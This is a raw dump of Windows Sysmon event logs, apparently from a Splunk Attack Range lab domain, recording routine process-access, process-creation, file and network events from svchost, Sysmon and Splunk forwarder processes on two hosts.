09:00:28.904{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047772Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:28.904{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047771Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:28.904{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047770Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:28.904{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047769Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:28.904{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047768Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:28.904{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047767Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:28.904{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047766Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:28.904{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047765Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:28.904{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047764Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:28.904{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047763Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:28.904{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047762Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:28.904{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047761Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:28.904{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047760Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:28.904{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047759Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:28.904{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001047758Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:28.352{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8DC5005C6161ED031115DC59A5BF646,SHA256=28080ADC0B6DC245D6E7C6D1C37794E7F97A5478CCB7B536BE29E1A02D52BF39,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047757Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:25.863{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49207-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000976348Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:28.655{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-882C-6151-7779-00000000FD01}2540C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976347Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:28.655{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976346Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:28.655{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976345Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:28.655{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976344Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:28.655{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976343Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:28.655{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976342Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:28.655{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976341Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:28.655{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976340Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:28.655{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976339Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:28.655{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976338Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:28.655{69CF5F33-7F27-614D-0500-00000000FD01}408984C:\Windows\system32\csrss.exe{69CF5F33-882C-6151-7779-00000000FD01}2540C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000976337Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:28.655{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-882C-6151-7779-00000000FD01}2540C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000976336Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:28.640{69CF5F33-882C-6151-7779-00000000FD01}2540C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000976335Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:25.830{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59248-false10.0.1.12-8000- 354300x8000000000000000976334Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:25.783{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse110.10.193.201-55823-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 